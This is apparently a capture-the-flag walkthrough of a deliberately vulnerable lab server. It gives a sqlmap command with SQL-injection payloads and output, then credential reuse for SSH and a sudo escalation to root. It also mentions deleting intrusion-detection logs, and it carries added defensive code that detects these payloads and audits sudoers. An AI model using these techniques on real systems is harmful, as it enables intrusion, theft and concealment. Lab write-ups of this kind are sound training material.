Quite a few places to check! Let’s see what we’ve got.
This is not your regular mail server:
I’ve never seen this before, so I checked the project’s homepage:
SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.
OK, I'll come back to this; for now I'm just checking the entire thing for possible entry points.
Trying to get to this folder pops up a basic authentication window. Moving on.
This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost
Here we have directory indexing, with a db.sql file that contains the following:
Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.
The first thing I tried was putting a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. Time to fire up sqlmap!
sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs
[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 4151=4151
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL--
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases :
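Seen from the defender's side, the sqlmap probes above leave a distinctive trail in the web server's access log. The following is an added example (not from the original post) that flags them; the log lines are constructed to mirror the payloads shown, and the parameter name `id` and the path `/index.html` come from the request sqlmap was pointed at.

```python
"""Flag SQL-injection probes in Apache access-log lines (added example).
The sample lines are constructed to mirror the sqlmap payloads above
(boolean, time-based, UNION) plus the single-quote probe that triggered
the mysql_fetch_row() warning."""
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Each pattern is one injection class sqlmap reported for the id parameter.
PATTERNS = {
    "boolean-blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),
    "time-blind":    re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union":         re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I),
    "quote-probe":   re.compile(r"^\d+['\"]"),  # numeric id followed by a quote
}

# Apache combined log: client, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(value):
    """Return the set of injection classes matched by one decoded parameter value."""
    return {name for name, rx in PATTERNS.items() if rx.search(value)}

def scan(lines):
    """Return (client, parameter, classes, status) for every parameter that looks injected.
    parse_qs decodes %xx once; unquote_plus runs again to catch double-encoded payloads."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for param, values in parse_qs(urlparse(target).query).items():
            for v in values:
                hits = classify(unquote_plus(v))
                if hits:
                    findings.append((client, param, sorted(hits), int(status)))
    return findings

SAMPLE_LOG = [  # constructed; client address is a placeholder
    '192.168.80.1 - - [01/Jan/2010:06:05:45 +0000] "GET /index.html?page=blog&title=Blog&id=2 HTTP/1.1" 200 5120',
    '192.168.80.1 - - [01/Jan/2010:06:05:46 +0000] "GET /index.html?page=blog&title=Blog&id=2%27 HTTP/1.1" 200 4311',
    '192.168.80.1 - - [01/Jan/2010:06:05:47 +0000] "GET /index.html?page=blog&title=Blog&id=2%20AND%204151%3D4151 HTTP/1.1" 200 5120',
    '192.168.80.1 - - [01/Jan/2010:06:05:48 +0000] "GET /index.html?page=blog&title=Blog&id=2%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tueL) HTTP/1.1" 200 5120',
    '192.168.80.1 - - [01/Jan/2010:06:05:53 +0000] "GET /index.html?page=blog&title=Blog&id=2%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 6001',
]

if __name__ == "__main__":
    for client, param, classes, status in scan(SAMPLE_LOG):
        print(f"{client} param={param} status={status} -> {', '.join(classes)}")
```

The first sample line is the legitimate request and produces no finding; the other four each map to one of the injection classes sqlmap reported.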
I then looked at the ehks database; the interesting table contains usernames and password hashes:
With dstevens' credentials I was able to log in to both the mail and the admin panel. The admin functionality allows you to create another blog page, which I tested, and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS logs of my attacks! I will delete them before I'm done, but for now I scrolled all the way to the bottom to find some real mail:
I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils. Just wanted to let you know.
Ehks Data Research Center
I'm thinking this mail is not just there to occupy storage; it's hinting that we'll have to do some binary exploitation on the target. Anyway, there is more mail about the server setup:
the server is up and running now and should be able to support most of
our needs. Don and I are still working on installing a few more patches
and configuring things. Let us know if you have any problems. Thanks!
Sr. Unix Admin
Prof. Ehks Data Research Center
I think I got the server pretty much set up. I just have to make some
more adjustments. Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low. I'll send more updates as I make
Prof. Ehks Data Research Center
There is also mail about a calendar feature that I wasn’t aware of:
I'd like to announce that the new calendaring software is online. You
all have accounts that you can log in with, they have the same username
and password as your machine accounts. Feel free to log into the new
system at http://192.168.0.6/calendar. Let me know if you have any
I had almost forgotten to check the /restricted folder, so I did that next. It worked with the pair pmoore/Homesite. Inside there are two text files:
Instructions for Posting to the Blog
Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.
Instructions for Webmail
Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)
Let Don or James know if you're having problems.
Just stuff we had figured out on our own. I checked the PHP version because of the mail hint; the headers report it as 5.1.2. Next I logged in to the calendar:
In the admin tab we can modify some calendar options and add a new user. Nothing too helpful for attacking the target, although I did try an RFI because a Nessus scan I had run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could log in to SSH with any of the usernames and passwords I had. And I was able to get into the box on the first try, as dstevens!
I looked around in his home directory; the files related to the site are hosted there. Then I tried to read the /etc/sudoers file, and it worked with sudo and his password:
# User privilege specification
root ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen ALL=(ALL) NOPASSWD:ALL
Well, look at these privileges! Then it's all a matter of becoming root with a simple su:
[dstevens@ctf4 calendar]$ sudo su -
[root@ctf4 ~]# whoami
Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax permissions and password reuse facilitated the compromise of the target.
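The sudoers entries quoted above are exactly what a privilege review should catch before an attacker does. As an added example (not from the original post), this script parses sudoers user specifications and flags unrestricted or passwordless root grants; the sample reproduces the three lines shown plus two constructed entries for contrast.

```python
"""Audit a sudoers file for unrestricted or passwordless root grants (added example).
Handles plain user specifications; Defaults and alias lines are skipped."""
import re

# who  hosts=(runas)  [tags:] commands   e.g.  achen ALL=(ALL) NOPASSWD:ALL
RULE_RE = re.compile(
    r"^(?P<who>%?[\w.-]+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$"
)
TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOEXEC:", "EXEC:")
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

def parse_rule(line):
    """Return a dict for one user specification, or None for comments/Defaults/aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    rest, tags = m["rest"].strip(), []
    while True:  # tags may be stacked, e.g. NOPASSWD: SETENV: ALL
        tag = next((t for t in TAGS if rest.upper().startswith(t)), None)
        if tag is None:
            break
        tags.append(tag[:-1])
        rest = rest[len(tag):].strip()
    return {"who": m["who"], "hosts": m["hosts"], "runas": m["runas"].strip(),
            "tags": tags, "commands": rest}

def audit(text):
    """Return (who, issue) pairs for grants a reviewer should question; root itself is exempt."""
    issues = []
    for raw in text.splitlines():
        r = parse_rule(raw)
        if r is None or r["who"] == "root":
            continue
        as_root = r["runas"] in ("ALL", "root", "")
        if as_root and r["commands"] == "ALL":
            issues.append((r["who"], "unrestricted root (ALL=(ALL) ALL)"))
        if "NOPASSWD" in r["tags"]:
            issues.append((r["who"], "passwordless sudo: " + r["commands"]))
    return issues

SAMPLE_SUDOERS = """\
# User privilege specification
root ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen ALL=(ALL) NOPASSWD:ALL
%wheel ALL=(ALL) ALL                        # constructed
backup ALL=(root) NOPASSWD: /usr/bin/rsync  # constructed
"""

if __name__ == "__main__":
    for who, issue in audit(SAMPLE_SUDOERS):
        print(f"{who:10} {issue}")
```

The rsync entry is reported only as passwordless, not as unrestricted root, which is the distinction a review cares about: a scoped NOPASSWD command is defensible, a bare ALL is not.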
/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun. |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue, |
| then shoot it with |
\ a blue-elephant gun. /